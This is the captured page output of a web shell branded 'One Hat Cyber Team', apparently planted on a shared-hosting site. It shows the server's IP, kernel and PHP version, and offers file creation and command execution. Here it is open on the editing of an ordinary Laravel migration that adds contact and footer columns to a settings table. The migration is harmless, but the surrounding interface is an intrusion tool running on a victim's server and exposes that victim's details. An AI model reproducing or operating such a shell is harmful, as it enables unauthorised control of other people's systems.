One Hat Cyber Team
Your IP :
3.140.254.100
Server IP :
162.241.123.123
Server :
Linux sh016.hostgator.in 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Server Software :
Apache
PHP Version :
8.2.25
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home1
/
saicsazq
/
instabees.in
/
database
/
migrations
/
Edit File:
2023_10_11_085004_add_footer_info_to_settings.php
<?php use Illuminate\Database\Migrations\Migration; use Illuminate\Database\Schema\Blueprint; use Illuminate\Support\Facades\Schema; return new class extends Migration { /** * Run the migrations. */ public function up(): void { Schema::table('settings', function (Blueprint $table) { $table->string('email')->nullable(); $table->string('phone')->nullable(); $table->text('about_us')->nullable(); $table->text('address')->nullable(); $table->string('open_day')->nullable(); $table->string('closed_day')->nullable(); }); } /** * Reverse the migrations. */ public function down(): void { Schema::table('settings', function (Blueprint $table) { $table->dropColumn('email'); $table->dropColumn('phone'); $table->dropColumn('about_us'); $table->dropColumn('address'); $table->dropColumn('open_day'); $table->dropColumn('closed_day'); }); } };
Simpan